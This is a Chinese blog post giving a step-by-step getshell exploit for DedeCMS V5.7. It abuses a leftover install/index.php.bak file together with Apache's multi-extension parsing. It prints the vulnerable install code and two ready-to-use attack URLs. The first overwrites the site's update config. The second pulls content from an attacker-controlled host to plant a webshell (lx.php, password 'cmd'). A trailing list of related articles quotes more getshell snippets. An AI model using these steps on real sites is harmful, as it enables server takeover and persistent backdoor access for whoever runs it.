把php写入织梦,dedeCMS远程写入getshell(测试版本V5.7)

最新推荐文章于 2022-05-18 18:34:08 发布
最新推荐文章于 2022-05-18 18:34:08 发布
阅读量209 收藏
点赞数
文章标签: 把php写入织梦

该漏洞必须结合apache的解析漏洞:

当Apache检测到一个文件有多个扩展名时,如1.php.bak,会从右向左判断,直到有一个Apache认识的扩展名。如果所有的扩展名Apache都不认识,那么变会按照httpd.conf配置中所指定的方式展示这个问题,一般默认情况下是“text/plain”这种方式。

dede在安装完成,如果没有删除install文件夹,在install下会有一个index.php.bak的备份文件,利用apache的解析漏洞,可以以php方式解析该文件。

在index.php.bak中有如下代码:

else if($step==11)

{require_once(‘../data/admin/config_update.php‘);$rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";$sql_content = file_get_contents($rmurl);$fp = fopen($install_demo_name,‘w‘);if(fwrite($fp,$sql_content))echo ‘ [√] 存在(您可以选择安装进行体验)‘;else

echo ‘ [×] 远程获取失败‘;unset($sql_content);fclose($fp);exit();

}

可以利用index.php.bak文件 step 11中的代码,来在服务器上写入任意文件!

由于远程要包含文件的服务器地址是通过 $updateHost 控制的,那我们首先利用代码来改写../data/admin/config_update.php这个文件,使我们可以自定义 $updateHost的值,那样就可以引用任何我们想要引用的文件啦!

利用方法:

随便找一个网站 新建个127.0.0.1/dedecms/demodata.a.txt

20180111002342143799.png

分别依次访问一下链接

http://www.xxxx.com/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php

http://www.xxxx.com/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=lx.php&updateHost=http://127.0.0.1/

即可生成http://www.xxxx.com/install/lx.php    密码cmd

weixin_39645041
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
dede批量Getshell
10-31
这个是百度批量的。自己保存为xx.php <...$exploit=Getshell($url); if (...% 5BGLOBALS%5D%5Bcfg_dbname%5D=de...
dedecms织梦 标签远程文件写入漏洞
weixin_34261415的博客
03-21 201
测试方法: @Sebug.net   dis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 前题条件,必须准备好自己的dede数据库,然后插入数据:   insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp =@fopen("1.php", \''a\'');@fwrite($fp, \''\''...
friendlink main.php,灰盒测试织梦dedecms 5.7 官网最新版 Getshell
weixin_29019241的博客
04-03 428
很久之前一直用dedecms做二次开发、直接做模版就好了,偶尔要写原生的php代码与dede交互,简单的了解了下里面的model,并未深入,dedecms漏洞那么多、、、能不能也找出一个漏洞呢。 下载了官网最新的程序研究了下。在前台有个提交友情链接的地方,链接是:/plus/flink_add.php,估计以前可能这里存在xss的吧。反正现在是修复了,不过发现传入的链接,在后台可以直接打开,这样就...
DedeCMS V5.7 SP1远程任意文件写入漏洞(CVE-2015-4553)
末初的CSDN博客
05-18 2313
文章目录漏洞原因漏洞影响版本漏洞原理分析漏洞复现 漏洞原因 uploads/install/index.php中对于全局传参遍历的处理不当造成可进行变量覆盖,进而导致远程文件上传Getshell 漏洞影响版本 <= Dedecms V5.7 SP1的所有版本 漏洞原理分析 uploads/install/index.php 对于全局传参遍历中的可变变量的写法${$_k}导致变量覆盖,RunMagicQuotes()每个参数的值进行了特殊字符转义处理 继续分析 uploads/install/i
dedecms5.7/install/index.php.bak getshell方法(亲测成功)
风炫 致力于顶级网络安全专家
01-30 7575
我是从安全参考上看到这一篇文章,作者:yaseng 。 但是我自己亲自测试了一下,果然存在这个漏洞。 给大家讲下, 原文: Dedecms对于安装程序的处理方法就是重命名install.php+lock文件验证,改install.php  位install.php.bak但是在apache 对这类型文件会解析成php,即可以执行之,对于lock  文件验证,不是还有dedecms的全局
MIPCMS 远程写入配置文件Getshell-1.pdf
最新发布
04-22
价值5999,vip免费阅读,可用于实战拟态,渗透测试学习,资源复现,红蓝对抗,攻防打点,漏洞复现,技术考证、权限维持,应急响应,Hvv实战
【实战篇】第16篇:MIPCMS 远程写入配置文件Getshell1
08-03
【实战篇】第16篇:MIPCMS 远程写入配置文件Getshell1
使用php测试硬盘写入速度示例
10-26
使用php写入一个1GB大小的文件,检查硬盘的写速率,可能有一定误差,一般电脑读写在20M/s,这个测试要执行大概40-50s
Elasticsearch进阶(一)写入性能基准测试写入性能优化
03-01
截图时,只上传过一次小测试数据(143万条),设置为:从图中可以看出,ip10节点上设置的数据目录:data1和data2目录工作正常,但是数据相同ip12中数据与ip10中数据不同,但是data1与data2数据相同ip13数据与ip12...
把List数据写入DataGridView
10-21
把List数据写入DataGridView
login.php gotopage,DedeCMS前台鸡助Getshell漏洞
weixin_36068015的博客
03-29 437
@phpice 后台再次编辑有问题,先把你的回复用我的账号发,晚点给你恢复过来我在16年的时候也以为是一个前台的漏洞,并提交给了先知,被驳回了,再后来我仔细测试后发现其实这是一个后台漏洞。如果不仔细读代码确实很容易被误导。你能在本地测试成功是因为你先登录了后台,此时已经存在了一个登录后台成功的session,然后再没用注销登录的情况下直接访问member目录,这个时候前台自动登录了admin账号,...
index.php.bak 颓废_dedecms5.7/install/index.php.bak getshell方法(亲测成功)
weixin_39746869的博客
12-22 441
我是从安全参考上看到这一篇文章,作者:yaseng 。但是我自己亲自测试了一下,果然存在这个漏洞。给大家讲下,Dedecms对于安装程序的处理方法就是重命名install.php+lock文件验证,改install.php位install.php.bak但是在apache 对这类型文件会解析成php,即可以执行之,对于lock文件验证,不是还有dedecms的全局变量注册机制。我以前还没注意,在是...
php远程写入shell,DeDecms远程写入漏洞webshell (dedecms漏洞)
weixin_34697798的博客
04-12 304
解释下Apache解析文件的流程:当Apache检测到一个文件有多个扩展名时,如1.php.bak,会从右向左判断,直到有一个Apache认识的扩展名。如果所有的扩展名Apache都不认识,那么变会按照httpd.conf配置中所指定的方式展示这个问题,一般默认情况下是“text/plain”这种方式。那么这样的话,像1.php.bak这样的文件名就会被当做php文件所解析。这也就是传说中的Apa...
dedecms download.php getshell,Dedecms_V5.7 getshell 利用后台文件上传功能漏洞
weixin_30938297的博客
04-02 408
虽然是复现文章,不过会更详细地来阐释这个漏洞,,因为现在后台getshell花样层出不穷,因此想要复现一波来学习一波getshell姿势~因为是最新的dedecms版本,因此我们直接在织梦官网上下载即可~http://www.dedecms.com/products/dedecms/downloads/DedeCMS V5.7 SP2正式版发布日期: 2017-04-05这里我测试的是utf-8版...
PHP代码审计(笔记)——命令注入 + dedecms远程写文件链接
OldBowl
03-11 666
PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一,国内著名的Web应用程序Discuz!、DedeCMS等都曾经存在过该类型漏洞。   Command Injection,即命令注入攻击,是指由于Web应用程序对用户提交的数据过滤不严格,导致黑客可以通过构造特殊命令字符串的方式,将数据提交至Web应用程序中,并利用该方式执行外部程序或系统命令实施攻击,非法获取数据或者网络资源等。  ...
DeDeCMS(织梦)变量覆盖0day getshell
weixin_33895016的博客
03-21 169
测试方法: @Sebug.net   dis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! #!usr/bin/php -w &lt;?php error_reporting(E_ERROR); set_time_limit(0); print_r(' DEDEcms Variable Coverage Exploit Author: [url]www.he...
dedecms最新版本存在远程包含漏洞--可getshell
pygain的博客
11-01 2226
小编最近发现,9月中旬发布的织梦CMS,由于管理员疏忽易存在远程包含漏洞,可getshell
dedeCMS后台getshell
qq_45300786的博客
05-12 1563
这里有三种方法 新建webshell和上传webshell 一、上传webshell 二、新建webshell shell工具连接成功 三、在默认模本里写入webshell 然后更新一下 连接shell工具 连上之后,在写入一个新的webshell,记得再把原来页面改回去。 shell工具连接这个系统文件 ...
Dedecms 5.7 SP2后台getshell
一个安全研究员
07-02 9809
前言 最近也打算研究研究各大cms的漏洞了,正好看到一篇关于dedecms后台getshell的文章,所以也自己动手复现一下,这样以后遇到了也更容易上手。该漏洞涉及的版本dedecms的最新版吧,下载地址: http://www.dedecms.com/products/dedecms/downloads/ 复现 版本: 我这里测试的是utf8版,这个版本应该不影响。 漏洞位...
本地spark怎么把数据写入远程hive
06-10
要将本地Spark中的数据写入远程Hive中,需要完成以下步骤: 1. 在本地Spark中读取数据,并将其转换为DataFrame。 2. 配置远程Hive的连接信息。 3. 将DataFrame中的数据写入远程Hive中。 以下是一个使用Spark...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值